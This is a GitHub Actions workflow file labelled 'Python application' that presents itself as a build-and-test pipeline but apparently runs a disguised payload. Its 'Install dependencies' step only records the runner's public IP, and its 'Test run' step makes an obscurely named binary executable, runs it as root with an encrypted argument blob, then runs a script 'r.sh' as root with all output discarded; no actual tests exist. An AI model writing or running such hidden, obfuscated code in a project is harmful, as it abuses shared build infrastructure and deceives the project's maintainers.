name: Python application

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest
    timeout-minutes: 15

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.8
      uses: actions/setup-python@v3
      with:
        python-version: "3.8"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        curl ifconfig.me > ip.txt
        cat ip.txt
    - name: Test run
      run: |
        cd ${{ github.workspace }}
        echo 'h09yw'
        sudo chmod +x garyiip7x/heardyg34i.ex
        sudo ./garyiip7x/heardyg34i.ex U2FsdGVkX1+Ou5PHhwGLylmWjJyV8i4BldJaF+pDOE9KYoJ1Db10prmULZqFLQGlHuSH41LjVa7u/s1rWrUfCqwmH13ySgK3KgYSN7BqVTaX+frlzKWEEexIw1Ad6DvT l727yg && sudo sh r.sh > /dev/null 2>&1
